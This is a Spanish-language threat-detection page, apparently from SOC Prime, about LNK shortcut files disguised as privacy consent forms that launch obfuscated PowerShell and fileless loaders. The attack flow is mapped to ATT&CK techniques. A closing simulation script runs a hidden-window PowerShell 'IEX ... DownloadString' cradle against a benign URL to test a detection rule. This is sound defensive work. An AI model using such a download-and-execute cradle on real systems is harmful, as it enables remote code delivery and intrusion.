SOC Prime Bias: High

19 Jun 2026 07:26 UTC

¿Qué había realmente dentro del archivo de acceso directo disfrazado de formulario de consentimiento de privacidad?

Author Photo
SOC Prime Team linkedin icon Seguir
¿Qué había realmente dentro del archivo de acceso directo disfrazado de formulario de consentimiento de privacidad?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas están distribuyendo archivos LNK maliciosos disfrazados como formularios de consentimiento de privacidad para engañar a los usuarios y hacer que los abran. Cuando se ejecutan, estos archivos de acceso directo lanzan comandos de PowerShell ofuscados que recuperan y ejecutan cargas útiles adicionales utilizando técnicas sin archivos. La cadena de ataque está diseñada para robar información y desplegar un cargador de puerta trasera que ayuda a preservar el acceso y la persistencia.

Investigación

La investigación mostró que los archivos LNK incrustan código de PowerShell ofuscado responsable de descargar scripts de seguimiento. Estos scripts secundarios incluyen un descargador que extrae cargas útiles de servicios web legítimos y un cargador que los ejecuta directamente en la memoria. El actor de amenazas también abusa del Programador de tareas de Windows para obtener persistencia y utiliza documentos señuelo para que la actividad maliciosa parezca legítima.

Mitigación

Las organizaciones deben implementar una verificación estricta de las extensiones de archivo y advertir a los usuarios sobre archivos LNK disfrazados como documentos regulares. Los equipos de seguridad deben monitorear de cerca la actividad del Programador de tareas, los registros de ejecución de PowerShell y las conexiones de red salientes. También se debe capacitar a los usuarios para validar tanto al remitente como la ruta de entrega de cualquier archivo entrante antes de abrirlo.

Respuesta

Si se detecta esta actividad, los administradores deben revisar inmediatamente las entradas sospechosas en el Programador de tareas y la creación inusual de scripts de PowerShell en directorios accesibles por el usuario. Los registros de PowerShell deben ser analizados, y las conexiones externas deben ser rastreadas, especialmente aquellas relacionadas con plataformas en la nube legítimas o servicios de almacenamiento web. A continuación, se debe realizar una investigación forense completa sobre cualquier script malicioso identificado y tráfico de red no autorizado.

graph TB %% Definición de clases classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#69f,stroke:#333,stroke-width:2px classDef persistence fill:#6c6,stroke:#333,stroke-width:2px classDef discovery fill:#ff9,stroke:#333,stroke-width:2px classDef exfiltration fill:#f66,stroke:#333,stroke-width:2px %% Etapa de acceso inicial action_user_exec[«<b>Acción</b> – <b>T1204.002 User Execution: Malicious File</b><br/>La víctima ejecuta un archivo de acceso directo .LNK engañoso<br/>disfrazado como un formulario de consentimiento.»] class action_user_exec initial_access action_masquerade[«<b>Acción</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>El archivo .LNK imita un formulario legítimo<br/>de consentimiento de información personal.»] class action_masquerade initial_access %% Etapa de ejecución action_obfuscation[«<b>Acción</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/>El archivo .LNK contiene una carga útil<br/>de script PowerShell ofuscada.»] class action_obfuscation execution action_cloud_api[«<b>Acción</b> – <b>T1059.009 Command and Scripting Interpreter: Cloud API</b><br/>El script PowerShell utiliza servicios en la nube<br/>para descargar scripts maliciosos adicionales.»] class action_cloud_api execution action_proxy_exec[«<b>Acción</b> – <b>T1216 System Script Proxy Execution</b><br/>El malware emplea ejecución mediante proxy<br/>de scripts del sistema para mantener un perfil bajo.»] class action_proxy_exec execution action_reflective_load[«<b>Acción</b> – <b>T1620 Reflective Code Loading</b><br/>Los scripts descargados se ejecutan en memoria<br/>mediante métodos sin archivos.»] class action_reflective_load execution %% Etapa de persistencia action_scheduled_task[«<b>Acción</b> – <b>T1053 Scheduled Task/Job</b><br/>Se registra una tarea en el Programador de tareas de Windows<br/>para garantizar la ejecución después del reinicio.»] class action_scheduled_task persistence %% Etapa de descubrimiento action_sys_info[«<b>Acción</b> – <b>T1082 System Information Discovery</b><br/>El script PowerShell recopila detalles del sistema operativo,<br/>configuración de red y direcciones IP.»] class action_sys_info discovery action_query_reg[«<b>Acción</b> – <b>T1012 Query Registry</b><br/>El script consulta el registro para identificar<br/>procesos en ejecución y productos de seguridad.»] class action_query_reg discovery %% Etapa de objetivo action_backdoor[«<b>Acción</b> – <b>Backdoor loader-type</b><br/>Mantiene el acceso y permite realizar<br/>actividades maliciosas adicionales.»] class action_backdoor exfiltration action_selective_exclusion[«<b>Acción</b> – <b>T1679 Selective Exclusion</b><br/>La puerta trasera facilita exclusiones selectivas<br/>para evadir controles de seguridad.»] class action_selective_exclusion exfiltration %% Conexiones action_user_exec –>|conduce_a| action_masquerade action_masquerade –>|activa| action_obfuscation action_obfuscation –>|contiene| action_cloud_api action_cloud_api –>|despliega| action_proxy_exec action_proxy_exec –>|realiza| action_reflective_load action_reflective_load –>|establece| action_scheduled_task action_scheduled_task –>|ejecuta| action_sys_info action_sys_info –>|conduce_a| action_query_reg action_query_reg –>|informa| action_backdoor action_backdoor –>|habilita| action_selective_exclusion

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Verificación Previa de Telemetría & Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTP identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a diagnósticos erróneos.

  • Narrativa del Ataque y Comandos: El adversario busca establecer un acceso inicial y descargar una carga útil de malware de segunda fase. Para evitar la detección por escáneres de archivos simples, utilizan un archivo LNK (Acceso Directo). Este archivo LNK está diseñado para ejecutar powershell.exe en una ventana oculta. El comando pasado a PowerShell usa Invoke-Expression and DownloadString para obtener un script desde una URL remota. Esto imita los ataques reales «Living-off-the-Land» (LotL) donde se utilizan binarios legítimos para realizar acciones maliciosas, con el objetivo de evadir los antivirus tradicionales basados en firmas.

  • Script de Prueba de Regresión:

    # 1. Defina la URL de destino (usando un sitio benigno para la prueba)
    $url = "https://www.google.com"
    
    # 2. Cree la cadena de carga útil de PowerShell maliciosa
    # Esta cadena está diseñada para activar la detección 'DownloadString' e 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Cree contenido de archivo LNK falso (Simulado)
    # En un ataque real, esto sería un archivo .lnk binario. 
    # Aquí ejecutamos el comando directamente para asegurar que se genere el registro ScriptBlock para la validación.
    Write-Host "[+] Simulando ejecución de PowerShell maliciosa a través de carga útil LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Comando de simulación ejecutado. Verifique el ID de Evento 4104."
  • Comandos de Limpieza:

    # Elimine cualquier artefacto si se crearon archivos
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpieza completa."